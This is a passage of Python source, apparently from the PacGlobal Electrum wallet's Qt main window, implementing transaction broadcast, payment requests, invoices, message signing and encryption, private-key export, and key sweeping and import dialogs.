partial(Transaction.sign, tx, self.tx_external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx, tx_desc): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Payment request has expired") status = False try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: msg = e.get_message_for_gui() except BestEffortRequestFailed as e: msg = repr(e) else: status, msg = True, tx.txid() if pr and status is True: self.invoices.set_paid(pr, tx.txid()) self.invoices.save() self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. 
Ack message: {ack_msg}") return status, msg # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: status, msg = result if status: if tx_desc is not None and tx.is_complete(): self.wallet.set_label(tx.txid(), tx_desc) parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() self.do_clear() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b): self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoice(self, key): self.invoices.remove(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = self.invoices.add(pr) status = self.invoices.get_status(key) self.invoice_list.update() if status == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point)) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request): self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.not_enough_funds = False self.payment_request = None self.payto_e.is_pr = False for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.feerate_e]: e.setText('') e.setFrozen(False) self.fee_slider.activate() self.feerate_e.setAmount(self.config.fee_per_kb()) self.size_e.setAmount(0) self.feerounding_icon.setVisible(False) self.set_pay_from([]) self.tx_external_keypairs = {} self.extra_payload.clear() self.hide_extra_payload() self.update_status() run_hook('do_clear', self) def 
set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() self.update_fee() def set_frozen_state_of_coins(self, utxos, freeze: bool): self.wallet.set_frozen_state_of_coins(utxos, freeze) self.utxo_list.update() self.update_fee() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) vbox.setContentsMargins(0, 0, 0, 0) vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) l.setObjectName("addresses_container") toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_addresses', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = l = UTXOList(self) l.setObjectName("utxo_container") return self.create_list_tab(l) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) l.setObjectName("contacts_container") return self.create_list_tab(l) def create_proposals_tab(self): from .masternode_budget_widgets import ProposalsTab self.proposals_list = ProposalsTab(self) return self.proposals_list def update_proposals_tab(self): # Disabled until API is stable. return if not self.masternode_manager: return self.proposals_list.update(list(self.network.all_proposals)) def remove_address(self, addr): if self.question(_("Do you want to remove {} from your wallet?").format(addr)): self.wallet.delete_address(addr) self.need_update.set() # history, addresses, coins self.clear_receive_tab() def get_coins(self): if self.pay_from: return self.pay_from else: return self.wallet.get_spendable_coins(None, self.config) def hide_extra_payload(self): self.extra_payload.hide() self.extra_payload_label.hide() def show_extra_payload(self): self.extra_payload.show() self.extra_payload_label.show() def spend_coins(self, coins): self.set_pay_from(coins) self.show_send_tab() self.update_fee() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_invoice(self, key): pr = self.invoices.get(key) if pr is None: self.show_error('Cannot find payment request in wallet.') return pr.verify(self.contacts) self.show_pr_details(pr) def 
show_pr_details(self, pr):
        key = pr.get_id()
        d = WindowModalDialog(self, _("Invoice"))
        vbox = QVBoxLayout(d)
        grid = QGridLayout()
        grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
        grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
        grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
        outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
        grid.addWidget(QLabel(outputs_str), 1, 1)
        expires = pr.get_expiration_date()
        grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
        grid.addWidget(QLabel(pr.get_memo()), 2, 1)
        grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
        grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
        if expires:
            grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
            grid.addWidget(QLabel(format_time(expires)), 4, 1)
        vbox.addLayout(grid)

        def do_export():
            name = str(key) + '.bip70'
            fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
            if not fn:
                return
            with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
        exportButton = EnterButton(_('Save'), do_export)

        def do_delete():
            if self.question(_('Delete invoice?')):
                self.invoices.remove(key)
                self.history_list.update()
                self.invoice_list.update()
                d.close()
        deleteButton = EnterButton(_('Delete'), do_delete)
        vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
        d.exec_()

    def do_pay_invoice(self, key):
        pr = self.invoices.get(key)
        self.payment_request = pr
        self.prepare_for_payment_request()
        pr.error = None  # this forces verify() to re-run
        if pr.verify(self.contacts):
            self.payment_request_ok()
        else:
            self.payment_request_error()

    def create_console_tab(self):
        from .console import Console
        self.console = console = Console()
        console.setObjectName("console_container")
        return console

    def update_console(self):
        console = self.console
        console.history = self.config.get("console-history",[])
        console.history_index = len(console.history)
        console.updateNamespace({
            'wallet': self.wallet,
            'network': self.network,
            'plugins': self.gui_object.plugins,
            'window': self,
            'config': self.config,
            'electrum': electrum_dash,
            'daemon': self.gui_object.daemon,
            'util': util,
            'bitcoin': bitcoin,
        })
        c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
        methods = {}
        def mkfunc(f, method):
            return lambda *args: f(method, args, self.password_dialog)
        for m in dir(c):
            if m[0]=='_' or m in ['network','wallet','config']: continue
            methods[m] = mkfunc(c._run, m)
        console.updateNamespace(methods)

    def create_status_bar(self):
        sb = QStatusBar()
        sb.setFixedHeight(35)
        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setObjectName("main_window_balance")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)

        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)

        self.update_check_button = QPushButton("")
        self.update_check_button.setFlat(True)
        self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
        self.update_check_button.setIcon(read_QIcon("update.png"))
        self.update_check_button.hide()
        sb.addPermanentWidget(self.update_check_button)

        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
        sb.addPermanentWidget(self.password_button)

        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
        self.seed_button =
StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self)) sb.addPermanentWidget(self.status_button) self.dash_net_button = StatusBarButton(read_QIcon('dash_net_0.png'), _("PACGlobal Network"), lambda: self.gui_object.show_dash_net_dialog(self)) self.update_dash_net_status_btn() sb.addPermanentWidget(self.dash_net_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) self.send_button.setVisible(not self.wallet.is_watching_only()) def change_password_dialog(self): from electrum_dash.storage import STO_EV_XPUB_PW if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(str(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): tab = self.tabs.currentWidget() #if hasattr(tab, 'searchable_list'): # tab.searchable_list.toggle_toolbar() #return self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = 
_('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) mpk_text.repaint() # macOS hack for #4777 # only show the combobox in case multiple accounts are available if len(mpk_list) > 1: def label(key): if isinstance(self.wallet, Multisig_Wallet): return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )' return '' labels = [label(i) for i in range(len(mpk_list))] on_click = lambda clayout: show_mpk(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click) vbox.addLayout(labels_clayout.layout()) else: vbox.addWidget(QLabel(_("Master Public Key"))) show_mpk(0) vbox.addWidget(mpk_text) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(dialog))) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(str(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None): if not data: return d = QRDialog(data, parent or self, title) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk, redeem_script = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(str(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) if redeem_script: vbox.addWidget(QLabel(_("Redeem Script") + ':')) rds_e = ShowQRTextEdit(text=redeem_script) rds_e.addCopyButton(self.app) vbox.addWidget(rds_e) 
vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in PacGlobal Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid PACGlobal address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid PACGlobal address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except 
BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, txt): from electrum_dash.transaction import tx_from_str try: tx = tx_from_str(txt) return Transaction(tx) except BaseException as e: self.show_critical(_("PacGlobal Electrum was unable to parse your transaction") + ":\n" + str(e)) return def read_tx_from_qrcode(self): from electrum_dash import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(str(e)) return if not data: return # if the user scanned a dash URI if str(data).startswith("dash:"): self.pay_to_URI(data) return # else if the user scanned an offline signed tx try: data = bh2u(bitcoin.base_decode(data, length=None, base=43)) except BaseException as e: self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e))) return tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self): fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn") if not fileName: return try: with open(fileName, "r") as f: file_content = f.read() except (ValueError, IOError, os.error) as reason: self.show_critical(_("PacGlobal Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction")) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum_dash import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + str(e)) return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) @protected def 
export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-pac-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... 
%d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("PacGlobal Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(str(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def import_labels(path): def _validate(data): return data # TODO def import_labels_assign(data): for key, value in data.items(): self.wallet.set_label(key, value) import_meta(path, _validate, import_labels_assign) def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), import_labels, on_import) def do_export_labels(self): def export_labels(filename): export_meta(self.wallet.labels, filename) export_meta_gui(self, _('labels'), export_labels) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {str(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise try: coins, keypairs = sweep_preparations(get_pk(), self.network) except Exception as e: # FIXME too broad... 
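            # sweep_preparations parses the supplied keys and queries the
            # network for their UTXOs, so both input and network errors can
            # surface here.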
self.show_message(str(e)) return self.do_clear() self.tx_external_keypairs = keypairs self.spend_coins(coins) self.payto_e.setText(addr) self.spend_max() self.payto_e.setFrozen(True) self.amount_e.setFrozen(True) self.warn_if_watching_only() def _do_import(self, title, header_layout, func): text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): self.need_restart = False d = WindowModalDialog(self, _('Preferences')) vbox = QVBoxLayout() tabs = QTabWidget() tabs.setObjectName("settings_tab") gui_widgets = [] fee_widgets = [] tx_widgets = [] id_widgets = [] # language lang_help = _('Select which language is used in the GUI (after restart).') lang_label = HelpLabel(_('Language') + ':', lang_help) lang_combo = QComboBox() from electrum_dash.i18n import languages lang_combo.addItems(list(languages.values())) lang_keys = list(languages.keys()) lang_cur_setting = self.config.get("language", '') try: index = lang_keys.index(lang_cur_setting) except ValueError: # not in list index = 0 lang_combo.setCurrentIndex(index) if not self.config.is_modifiable('language'): for w in [lang_combo, lang_label]: w.setEnabled(False) def on_lang(x): lang_request = list(languages.keys())[lang_combo.currentIndex()] if lang_request != self.config.get('language'): self.config.set_key("language", lang_request, True) self.need_restart = True lang_combo.currentIndexChanged.connect(on_lang) gui_widgets.append((lang_label, lang_combo)) nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." 
